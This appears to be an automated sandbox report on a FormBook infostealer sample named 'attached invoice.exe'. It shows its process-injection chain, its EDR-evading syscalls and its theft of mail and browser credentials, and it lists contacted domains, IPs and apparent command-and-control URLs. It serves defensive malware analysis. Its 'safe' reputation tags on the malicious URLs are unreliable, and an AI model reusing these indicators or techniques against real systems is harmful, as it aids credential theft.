                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567213 Sample: attached invoice.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 34 www.aktmarket.xyz 2->34 36 www.seeseye.website 2->36 38 24 other IPs or domains 2->38 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 attached invoice.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 34->48 process4 file5 26 C:\Users\user\...\attached invoice.exe.log, ASCII 10->26 dropped 60 Injects a PE file into a foreign processes 10->60 14 attached invoice.exe 10->14         started        signatures6 process7 signatures8 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Queues an APC in another process (thread injection) 14->66 68 Found direct / indirect Syscall (likely to bypass EDR) 14->68 17 RAVCpl64.exe 14->17 injected process9 dnsIp10 28 www.dymar.shop 185.68.16.160, 49918, 49919, 49920 UKRAINE-ASUA Ukraine 17->28 30 www.seeseye.website 103.224.182.242, 49910, 49911, 49912 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->30 32 12 other IPs or domains 17->32 40 Found direct / indirect Syscall (likely to bypass EDR) 17->40 21 cacls.exe 13 17->21         started        signatures11 process12 signatures13 52 Tries to steal Mail credentials (via file / registry access) 21->52 54 Tries to harvest and steal browser information (history, passwords, etc) 21->54 56 Modifies the context of a thread in another process (thread injection) 21->56 58 2 other signatures 21->58 24 firefox.exe 21->24         started        process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                attached invoice.exe39%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                attached invoice.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://www.dymar.shop/index.php?route=information/sitemap0%Avira URL Cloudsafe
                https://www.dymar.shop/image/catalog/favicon.png0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=product/special0%Avira URL Cloudsafe
                http://www.kmmm759j.sbs/vz2d/?6aonl5x=xnuAwqhG0E1cgnLHCuPG8putHNvOywveoj5D04lQyE1r/ADkIFYhezZZAVu20e8okSIJRDKdbgbPnaZH6+cIwh3xzWT5SsSVbw2mIitnDZbRgyAsQQEm3mk=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                https://www.dymar.shop/0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=common/currency/currency0%Avira URL Cloudsafe
                https://www.dymar.shop/o-nas0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/voucher0%Avira URL Cloudsafe
                http://www.iglpg.online/rbqc/0%Avira URL Cloudsafe
                http://www.superiorfencing.net/5ltk/0%Avira URL Cloudsafe
                http://www.superiorfencing.net/5ltk/?6aonl5x=lFCyjgUgRWTJD3PvHrx0okuLDoXTkt/loKBcMldX7EHyWmdK0Vf5T1rkkoFAHq8jWgOppi08ScKStlrsdMkFXoBVPkBmvOuk6JZ8uBPhbCVyIuKgJdug7RU=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/wb7v/?6aonl5x=IA0aHAKfw1DI7BcY7ryjbxCppHi9OmzIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpHPOs3B1qYTvrd0Qj0s=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.bootleggersrt.online/vxxt/0%Avira URL Cloudsafe
                http://www.techmiseajour.net/jytl/0%Avira URL Cloudsafe
                https://www.dymar.shop/informaciya-o-dostavke0%Avira URL Cloudsafe
                http://www.bahaeng.com/y1af/0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/login0%Avira URL Cloudsafe
                http://www.dymar.shop/smoc/0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/wishlist0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/order0%Avira URL Cloudsafe
                http://www.dymar.shop/smoc/?6aonl5x=lPVxR6/rWOJUAmNkBdPYmYT9z/j33Ol+ibkJWFBTXqAA3JwmClrtL6XObj0m4TTFla53vfd2ewxujMvJwABfMfcmIBnaaalZ+S7LqTZAqXv17vO/nvgn6IY=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                https://www.dymar.shop/image/cache/catalog/DYMAR%20250-300x300.jpg0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=product/compare0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/account0%Avira URL Cloudsafe
                https://www.dymar.shop/usloviya-soglasheniya0%Avira URL Cloudsafe
                http://www.seeseye.website/ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzA0%Avira URL Cloudsafe
                https://www.domeneshop.no/whois0%Avira URL Cloudsafe
                http://www.hemph.online/227m/0%Avira URL Cloudsafe
                https://www.domainnameshop.com/whois0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/register0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=affiliate/login0%Avira URL Cloudsafe
                http://www.golivenow.live/r2k9/0%Avira URL Cloudsafe
                https://www.dymar.shop/politika-bezopasnosti0%Avira URL Cloudsafe
                http://www.bahaeng.com/y1af/?6aonl5x=IqLRcMuEYJF3qnHudOsUzMwj/zs+8hv653U5jAETSKTHOAZ6DMxoKSmDfoiNXSDpEOcnUvDePh8sSvYUl7mpsmobIWXHnSvdrxN11MHL3cA/rWK2VFF3/cE=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.samundri.online/hz0b/0%Avira URL Cloudsafe
                https://www.dymar.shop0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/pfw9/0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=common/language/language0%Avira URL Cloudsafe
                http://www.techmiseajour.net/jytl/?6aonl5x=g6hM5OfAy0aZTOdzzizqGwSFwxhc1L9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGnRIPeEv+Y3Y8H3JjIc=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/wb7v/0%Avira URL Cloudsafe
                http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                http://www.seeseye.website/ebz6/0%Avira URL Cloudsafe
                https://www.dymar.shop/image/catalog/DYMAR0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=product/manufacturer0%Avira URL Cloudsafe
                http://www.bootleggersrt.online/vxxt/?6aonl5x=jMu8lGE22mRQMFkA02Z4QgHVvRKiIIAfjF1Au58NL63AyUoRBgSkNxa8Io3HGFLKqYvOjgOM4kRS/vuEKI7jIA/GEFV6EXDHqvtGhZ86XLQwQ00v5R3xroM=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.hemph.online/227m/?6aonl5x=zu1kjW5LnnBHDrOoJJXjEyap72qsvzZWMrrFEEjR4VpE0fuyjq12ZNIz8+5tcycS4E2gPV8m77870zUeK486K4PDE8XvvsLaWTViceKvZ+jMyMjrF9JiWcw=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.gk88top.top/4gxa/?6aonl5x=IVIViSCd4+diLw5iv6lFKzUz3DzQ1kWsQQRVAN/m1p/rxaGnfzS1IlrZSHFapfjNT88wuN41KZDTvbIxWygyz4hNkR6cPF/DwShRWPnwmriOjp5z/OZQWVs=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.christinascuties.net/raea/?6aonl5x=PqKj/8KuIq0WSNkJftYVxtH3PgUbwps1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVXeOdEURVWf/EIQOijo=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                https://www.domainnameshop.com/0%Avira URL Cloudsafe
                http://www.seeseye.website/ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzA+H3rtA/rIZAdo0g/oDUTfbsJ2pfg1bAoxQTquSVCJvkgdI11EDq3zwrg4WM3Dp4Vk=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                https://www.hostgator.com.br0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=information/contact0%Avira URL Cloudsafe
                http://www.rafconstrutora.online/j7ub/?6aonl5x=M31vjVse/vBHPClvW92sHY7DTEoHQnoyrxzVLyROLYYAQdrxO36MkUElM+4Sk6N4OaZzF61ZUyEPGTTLpIW+aC9+xnt1oIHfkyDsG4AUT/SJuMBYTZz9qAA=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=error/not_found&amp;6aonl5x=lPVxR6/rWOJUAmNkBdPYmYT9z/j33Ol0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/pfw9/?6aonl5x=45l5W170mEENNSUktK0c1bHcj3rn0rpe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF2xmeGRELDNSdfeX9e8=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.kmmm759j.sbs0%Avira URL Cloudsafe
                http://localhost/arkanoid_server/requests.php0%Avira URL Cloudsafe
                http://www.gk88top.top/4gxa/0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/return/add0%Avira URL Cloudsafe
                http://www.golivenow.live/r2k9/?6aonl5x=R82aEe+RY/7ruopLNyHjIZCKrihy+djUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfXMMWJW+Krmg6/pm3HE=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/newsletter0%Avira URL Cloudsafe
                http://www.iglpg.online/rbqc/?6aonl5x=3OhzIPQDpE/WyOq7C50qyvj3dc8PiYJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPw974q4r0F7yEJBb1u8=&wYHk=M_B-ghc2HqoWhmeC0%Avira URL Cloudsafe
                http://www.kmmm759j.sbs/vz2d/0%Avira URL Cloudsafe
                http://www.rafconstrutora.online/j7ub/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                4hong.cnfol.beauty
                		43.156.176.253
                		truetrue
                  		unknown
                  www.christinascuties.net
                  		74.208.236.156
                  		truetrue
                    		unknown
                    www.seeseye.website
                    		103.224.182.242
                    		truetrue
                      		unknown
                      www.golivenow.live
                      		66.29.149.46
                      		truetrue
                        		unknown
                        superiorfencing.net
                        		103.230.159.86
                        		truetrue
                          		unknown
                          www.rafconstrutora.online
                          		172.67.159.24
                          		truetrue
                            		unknown
                            www.dymar.shop
                            		185.68.16.160
                            		truetrue
                              		unknown
                              www.aktmarket.xyz
                              		13.248.169.48
                              		truetrue
                                		unknown
                                iglpg.online
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  1hong.pels5zqo.shop
                                  		129.226.153.85
                                  		truetrue
                                    		unknown
                                    www.bahaeng.com
                                    		185.134.245.113
                                    		truetrue
                                      		unknown
                                      techmiseajour.net
                                      		84.32.84.32
                                      		truetrue
                                        		unknown
                                        www.gk88top.top
                                        		104.21.7.187
                                        		truetrue
                                          		unknown
                                          samundri.online
                                          		84.32.84.32
                                          		truetrue
                                            		unknown
                                            www.bootleggersrt.online
                                            		31.31.196.17
                                            		truetrue
                                              		unknown
                                              www.hemph.online
                                              		31.31.196.17
                                              		truetrue
                                                		unknown
                                                www.techmiseajour.net
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.kmmm759j.sbs
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.iglpg.online
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.1qcczjvh2.autos
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.samundri.online
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          www.superiorfencing.net
                                                          		unknown
                                                          		unknownfalse
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.iglpg.online/rbqc/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.superiorfencing.net/5ltk/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.kmmm759j.sbs/vz2d/?6aonl5x=xnuAwqhG0E1cgnLHCuPG8putHNvOywveoj5D04lQyE1r/ADkIFYhezZZAVu20e8okSIJRDKdbgbPnaZH6+cIwh3xzWT5SsSVbw2mIitnDZbRgyAsQQEm3mk=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.techmiseajour.net/jytl/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.aktmarket.xyz/wb7v/?6aonl5x=IA0aHAKfw1DI7BcY7ryjbxCppHi9OmzIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpHPOs3B1qYTvrd0Qj0s=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.superiorfencing.net/5ltk/?6aonl5x=lFCyjgUgRWTJD3PvHrx0okuLDoXTkt/loKBcMldX7EHyWmdK0Vf5T1rkkoFAHq8jWgOppi08ScKStlrsdMkFXoBVPkBmvOuk6JZ8uBPhbCVyIuKgJdug7RU=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.bootleggersrt.online/vxxt/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.bahaeng.com/y1af/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.dymar.shop/smoc/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.dymar.shop/smoc/?6aonl5x=lPVxR6/rWOJUAmNkBdPYmYT9z/j33Ol+ibkJWFBTXqAA3JwmClrtL6XObj0m4TTFla53vfd2ewxujMvJwABfMfcmIBnaaalZ+S7LqTZAqXv17vO/nvgn6IY=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.hemph.online/227m/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.samundri.online/hz0b/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.golivenow.live/r2k9/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.1qcczjvh2.autos/pfw9/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.bahaeng.com/y1af/?6aonl5x=IqLRcMuEYJF3qnHudOsUzMwj/zs+8hv653U5jAETSKTHOAZ6DMxoKSmDfoiNXSDpEOcnUvDePh8sSvYUl7mpsmobIWXHnSvdrxN11MHL3cA/rWK2VFF3/cE=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.techmiseajour.net/jytl/?6aonl5x=g6hM5OfAy0aZTOdzzizqGwSFwxhc1L9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGnRIPeEv+Y3Y8H3JjIc=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.aktmarket.xyz/wb7v/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.seeseye.website/ebz6/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.bootleggersrt.online/vxxt/?6aonl5x=jMu8lGE22mRQMFkA02Z4QgHVvRKiIIAfjF1Au58NL63AyUoRBgSkNxa8Io3HGFLKqYvOjgOM4kRS/vuEKI7jIA/GEFV6EXDHqvtGhZ86XLQwQ00v5R3xroM=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.christinascuties.net/raea/?6aonl5x=PqKj/8KuIq0WSNkJftYVxtH3PgUbwps1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVXeOdEURVWf/EIQOijo=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.hemph.online/227m/?6aonl5x=zu1kjW5LnnBHDrOoJJXjEyap72qsvzZWMrrFEEjR4VpE0fuyjq12ZNIz8+5tcycS4E2gPV8m77870zUeK486K4PDE8XvvsLaWTViceKvZ+jMyMjrF9JiWcw=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.gk88top.top/4gxa/?6aonl5x=IVIViSCd4+diLw5iv6lFKzUz3DzQ1kWsQQRVAN/m1p/rxaGnfzS1IlrZSHFapfjNT88wuN41KZDTvbIxWygyz4hNkR6cPF/DwShRWPnwmriOjp5z/OZQWVs=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.seeseye.website/ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzA+H3rtA/rIZAdo0g/oDUTfbsJ2pfg1bAoxQTquSVCJvkgdI11EDq3zwrg4WM3Dp4Vk=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.rafconstrutora.online/j7ub/?6aonl5x=M31vjVse/vBHPClvW92sHY7DTEoHQnoyrxzVLyROLYYAQdrxO36MkUElM+4Sk6N4OaZzF61ZUyEPGTTLpIW+aC9+xnt1oIHfkyDsG4AUT/SJuMBYTZz9qAA=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.1qcczjvh2.autos/pfw9/?6aonl5x=45l5W170mEENNSUktK0c1bHcj3rn0rpe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF2xmeGRELDNSdfeX9e8=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.gk88top.top/4gxa/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.golivenow.live/r2k9/?6aonl5x=R82aEe+RY/7ruopLNyHjIZCKrihy+djUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfXMMWJW+Krmg6/pm3HE=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.iglpg.online/rbqc/?6aonl5x=3OhzIPQDpE/WyOq7C50qyvj3dc8PiYJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPw974q4r0F7yEJBb1u8=&wYHk=M_B-ghc2HqoWhmeCtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.rafconstrutora.online/j7ub/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.kmmm759j.sbs/vz2d/true
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabcacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.dymar.shop/index.php?route=common/currency/currencyRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchcacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dymar.shop/index.php?route=product/specialRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://duckduckgo.com/ac/?q=cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.dymar.shop/index.php?route=account/voucherRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/o-nasRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/index.php?route=information/sitemapRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/image/catalog/favicon.pngRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/index.php?route=account/loginRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/informaciya-o-dostavkeRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/index.php?route=account/wishlistcacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/index.php?route=account/orderRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://x1.c.lencr.org/0firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://x1.i.lencr.org/0firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.dymar.shop/index.php?route=account/accountcacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://c.pki.goog/r/r1.crl0firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.dymar.shop/image/cache/catalog/DYMAR%20250-300x300.jpgRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.dymar.shop/index.php?route=product/compareRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.domeneshop.no/whoisRAVCpl64.exe, 00000005.00000002.816303830162.00000000091E2000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004F52000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.seeseye.website/ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzAcacls.exe, 00000006.00000002.815529240346.0000000004A9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.dymar.shop/usloviya-soglasheniyaRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.domainnameshop.com/whoiscacls.exe, 00000006.00000002.815529240346.0000000004F52000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.dymar.shop/index.php?route=account/registerRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.dymar.shop/index.php?route=affiliate/loginRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.dymar.shop/index.php?route=common/language/languageRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://i.pki.goog/r1.crt0firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.dymar.shop/politika-bezopasnostiRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.dymar.shopcacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.dymar.shop/image/catalog/DYMARRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.dymar.shop/index.php?route=product/manufacturerRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://ocsp.rootca1.amazontrust.com0:firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpfalse
